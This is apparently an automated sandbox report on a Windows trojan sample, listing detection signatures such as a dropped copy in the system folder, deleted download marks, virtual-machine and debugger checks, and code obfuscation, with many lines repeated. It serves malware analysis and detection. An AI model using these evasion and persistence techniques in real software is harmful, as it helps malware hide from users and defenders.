Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 004011C0 appears 58 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 0041E5AD appears 92 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 00419CA9 appears 109 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 004031B0 appears 37 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 004033F0 appears 52 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 00418E47 appears 40 times
PE file contains strange resources
Source: JI93UWUR2p.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: JI93UWUR2p.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: JI93UWUR2p.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: JI93UWUR2p.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: JI93UWUR2p.exe, 00000000.00000002.649010856.0000000002A50000.00000002.00000001.sdmp Binary or memory string: originalfilename vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe, 00000000.00000002.649010856.0000000002A50000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe, 00000000.00000002.647975530.000000000044B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFormula.EXED vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe, 00000000.00000002.648891203.0000000002950000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe Binary or memory string: OriginalFilenameFormula.EXED vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe, 00000000.00000002.649010856.0000000002A50000.00000002.00000001.sdmp Binary or memory string: originalfilename vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe, 00000000.00000002.649010856.0000000002A50000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe, 00000000.00000002.647975530.000000000044B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFormula.EXED vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe, 00000000.00000002.648891203.0000000002950000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe Binary or memory string: OriginalFilenameFormula.EXED vs JI93UWUR2p.exe
Source: classification engine Classification label: mal92.troj.evad.winEXE@3/0@0/3
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: OpenSCManagerW,CreateServiceW,_snwprintf,CloseServiceHandle,CloseServiceHandle, 0_2_021D87A0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: OpenSCManagerW,CreateServiceW,_snwprintf,CloseServiceHandle,CloseServiceHandle, 0_2_021D87A0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02214C70 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,Process32FirstW,FindCloseChangeNotification, 1_2_02214C70
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02214C70 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,Process32FirstW,FindCloseChangeNotification, 1_2_02214C70
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041611C FindResourceA,LoadResource,LockResource,FreeResource, 0_2_0041611C
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041611C FindResourceA,LoadResource,LockResource,FreeResource, 0_2_0041611C
Source: JI93UWUR2p.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: JI93UWUR2p.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: JI93UWUR2p.exe Virustotal: Detection: 70%
Source: JI93UWUR2p.exe ReversingLabs: Detection: 89%
Source: JI93UWUR2p.exe Virustotal: Detection: 70%
Source: JI93UWUR2p.exe ReversingLabs: Detection: 89%
Source: unknown Process created: C:\Users\user\Desktop\JI93UWUR2p.exe 'C:\Users\user\Desktop\JI93UWUR2p.exe'
Source: unknown Process created: C:\Windows\SysWOW64\mstsc\winusb.exe C:\Windows\SysWOW64\mstsc\winusb.exe
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Process created: C:\Windows\SysWOW64\mstsc\winusb.exe C:\Windows\SysWOW64\mstsc\winusb.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\JI93UWUR2p.exe 'C:\Users\user\Desktop\JI93UWUR2p.exe'
Source: unknown Process created: C:\Windows\SysWOW64\mstsc\winusb.exe C:\Windows\SysWOW64\mstsc\winusb.exe
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Process created: C:\Windows\SysWOW64\mstsc\winusb.exe C:\Windows\SysWOW64\mstsc\winusb.exe Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: JI93UWUR2p.exe Static PE information: section name: RT_CURSOR
Source: JI93UWUR2p.exe Static PE information: section name: RT_BITMAP
Source: JI93UWUR2p.exe Static PE information: section name: RT_ICON
Source: JI93UWUR2p.exe Static PE information: section name: RT_MENU
Source: JI93UWUR2p.exe Static PE information: section name: RT_DIALOG
Source: JI93UWUR2p.exe Static PE information: section name: RT_STRING
Source: JI93UWUR2p.exe Static PE information: section name: RT_ACCELERATOR
Source: JI93UWUR2p.exe Static PE information: section name: RT_GROUP_ICON
Source: JI93UWUR2p.exe Static PE information: section name: RT_CURSOR
Source: JI93UWUR2p.exe Static PE information: section name: RT_BITMAP
Source: JI93UWUR2p.exe Static PE information: section name: RT_ICON
Source: JI93UWUR2p.exe Static PE information: section name: RT_MENU
Source: JI93UWUR2p.exe Static PE information: section name: RT_DIALOG
Source: JI93UWUR2p.exe Static PE information: section name: RT_STRING
Source: JI93UWUR2p.exe Static PE information: section name: RT_ACCELERATOR
Source: JI93UWUR2p.exe Static PE information: section name: RT_GROUP_ICON
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004024D0 LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_004024D0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004024D0 LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_004024D0
PE file contains an invalid checksum
Source: JI93UWUR2p.exe Static PE information: real checksum: 0x979a0 should be: 0x93829
Source: JI93UWUR2p.exe Static PE information: real checksum: 0x979a0 should be: 0x93829
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004203E5 push ecx; ret 0_2_004203F8
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041E685 push ecx; ret 0_2_0041E698
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5E20 push ecx; mov dword ptr [esp], 0000EDA0h 0_2_021D5E21
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5E50 push ecx; mov dword ptr [esp], 00007A5Dh 0_2_021D5E51
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5E80 push ecx; mov dword ptr [esp], 0000C40Ah 0_2_021D5E81
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5EE0 push ecx; mov dword ptr [esp], 00000AC6h 0_2_021D5EE1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5F40 push ecx; mov dword ptr [esp], 0000E5DEh 0_2_021D5F41
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5F70 push ecx; mov dword ptr [esp], 0000E7B9h 0_2_021D5F71
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5FC0 push ecx; mov dword ptr [esp], 0000E566h 0_2_021D5FC1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5D30 push ecx; mov dword ptr [esp], 000012E8h 0_2_021D5D31
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5D70 push ecx; mov dword ptr [esp], 00008FD2h 0_2_021D5D71
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5DA0 push ecx; mov dword ptr [esp], 00005C85h 0_2_021D5DA1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5DD0 push ecx; mov dword ptr [esp], 0000F574h 0_2_021D5DD1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187A1E push ecx; mov dword ptr [esp], 0000C40Ah 0_2_02187A1F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187A7E push ecx; mov dword ptr [esp], 00000AC6h 0_2_02187A7F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187ADE push ecx; mov dword ptr [esp], 0000E5DEh 0_2_02187ADF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187B0E push ecx; mov dword ptr [esp], 0000E7B9h 0_2_02187B0F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187B5E push ecx; mov dword ptr [esp], 0000E566h 0_2_02187B5F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021878CE push ecx; mov dword ptr [esp], 000012E8h 0_2_021878CF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218790E push ecx; mov dword ptr [esp], 00008FD2h 0_2_0218790F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218793E push ecx; mov dword ptr [esp], 00005C85h 0_2_0218793F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218796E push ecx; mov dword ptr [esp], 0000F574h 0_2_0218796F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021879BE push ecx; mov dword ptr [esp], 0000EDA0h 0_2_021879BF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021879EE push ecx; mov dword ptr [esp], 00007A5Dh 0_2_021879EF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004203E5 push ecx; ret 0_2_004203F8
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041E685 push ecx; ret 0_2_0041E698
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5E20 push ecx; mov dword ptr [esp], 0000EDA0h 0_2_021D5E21
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5E50 push ecx; mov dword ptr [esp], 00007A5Dh 0_2_021D5E51
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5E80 push ecx; mov dword ptr [esp], 0000C40Ah 0_2_021D5E81
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5EE0 push ecx; mov dword ptr [esp], 00000AC6h 0_2_021D5EE1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5F40 push ecx; mov dword ptr [esp], 0000E5DEh 0_2_021D5F41
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5F70 push ecx; mov dword ptr [esp], 0000E7B9h 0_2_021D5F71
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5FC0 push ecx; mov dword ptr [esp], 0000E566h 0_2_021D5FC1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5D30 push ecx; mov dword ptr [esp], 000012E8h 0_2_021D5D31
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5D70 push ecx; mov dword ptr [esp], 00008FD2h 0_2_021D5D71
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5DA0 push ecx; mov dword ptr [esp], 00005C85h 0_2_021D5DA1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5DD0 push ecx; mov dword ptr [esp], 0000F574h 0_2_021D5DD1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187A1E push ecx; mov dword ptr [esp], 0000C40Ah 0_2_02187A1F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187A7E push ecx; mov dword ptr [esp], 00000AC6h 0_2_02187A7F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187ADE push ecx; mov dword ptr [esp], 0000E5DEh 0_2_02187ADF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187B0E push ecx; mov dword ptr [esp], 0000E7B9h 0_2_02187B0F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187B5E push ecx; mov dword ptr [esp], 0000E566h 0_2_02187B5F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021878CE push ecx; mov dword ptr [esp], 000012E8h 0_2_021878CF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218790E push ecx; mov dword ptr [esp], 00008FD2h 0_2_0218790F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218793E push ecx; mov dword ptr [esp], 00005C85h 0_2_0218793F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218796E push ecx; mov dword ptr [esp], 0000F574h 0_2_0218796F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021879BE push ecx; mov dword ptr [esp], 0000EDA0h 0_2_021879BF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021879EE push ecx; mov dword ptr [esp], 00007A5Dh 0_2_021879EF
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_004203E5 push ecx; ret 1_2_004203F8
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041E685 push ecx; ret 1_2_0041E698
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02215E20 push ecx; mov dword ptr [esp], 0000EDA0h 1_2_02215E21
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02215E50 push ecx; mov dword ptr [esp], 00007A5Dh 1_2_02215E51
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02215E80 push ecx; mov dword ptr [esp], 0000C40Ah 1_2_02215E81
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02215EE0 push ecx; mov dword ptr [esp], 00000AC6h 1_2_02215EE1
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02215F70 push ecx; mov dword ptr [esp], 0000E7B9h 1_2_02215F71

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Executable created and started: C:\Windows\SysWOW64\mstsc\winusb.exe Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Executable created and started: C:\Windows\SysWOW64\mstsc\winusb.exe Jump to behavior
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe PE file moved: C:\Windows\SysWOW64\mstsc\winusb.exe Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe PE file moved: C:\Windows\SysWOW64\mstsc\winusb.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File opened: C:\Windows\SysWOW64\mstsc\winusb.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File opened: C:\Windows\SysWOW64\mstsc\winusb.exe:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00410F66 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00410F66
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00410F66 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00410F66
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_00410F66 IsIconic,GetWindowPlacement,GetWindowRect, 1_2_00410F66
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\JI93UWUR2p.exe API coverage: 9.5 %
Source: C:\Users\user\Desktop\JI93UWUR2p.exe API coverage: 9.5 %
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 0_2_021D38A0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 0_2_021D38A0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_022138A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 1_2_022138A0
Source: winusb.exe, 00000001.00000002.915399663.0000000002900000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW M{%SystemRoot%\system32\mswsock.dll
Source: winusb.exe, 00000001.00000002.915417523.000000000290F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: winusb.exe, 00000001.00000002.915399663.0000000002900000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW M{%SystemRoot%\system32\mswsock.dll
Source: winusb.exe, 00000001.00000002.915417523.000000000290F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\JI93UWUR2p.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\JI93UWUR2p.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\mstsc\winusb.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\JI93UWUR2p.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\JI93UWUR2p.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\mstsc\winusb.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004024D0 LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_004024D0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004024D0 LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_004024D0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041D41B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041D41B
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041D41B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041D41B
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004024D0 LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_004024D0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004024D0 LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_004024D0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D3ED0 mov eax, dword ptr fs:[00000030h] 0_2_021D3ED0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D4DF0 mov eax, dword ptr fs:[00000030h] 0_2_021D4DF0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02185A6E mov eax, dword ptr fs:[00000030h] 0_2_02185A6E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218095E mov eax, dword ptr fs:[00000030h] 0_2_0218095E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218698E mov eax, dword ptr fs:[00000030h] 0_2_0218698E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02180456 mov eax, dword ptr fs:[00000030h] 0_2_02180456
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021A1030 mov eax, dword ptr fs:[00000030h] 0_2_021A1030
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D3ED0 mov eax, dword ptr fs:[00000030h] 0_2_021D3ED0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D4DF0 mov eax, dword ptr fs:[00000030h] 0_2_021D4DF0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02185A6E mov eax, dword ptr fs:[00000030h] 0_2_02185A6E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218095E mov eax, dword ptr fs:[00000030h] 0_2_0218095E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218698E mov eax, dword ptr fs:[00000030h] 0_2_0218698E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02180456 mov eax, dword ptr fs:[00000030h] 0_2_02180456
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021A1030 mov eax, dword ptr fs:[00000030h] 0_2_021A1030
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02213ED0 mov eax, dword ptr fs:[00000030h] 1_2_02213ED0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02214DF0 mov eax, dword ptr fs:[00000030h] 1_2_02214DF0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_021E1030 mov eax, dword ptr fs:[00000030h] 1_2_021E1030
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D3070 PathFindExtensionW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap, 0_2_021D3070
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D3070 PathFindExtensionW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap, 0_2_021D3070
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041D41B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041D41B
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00423ABF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00423ABF
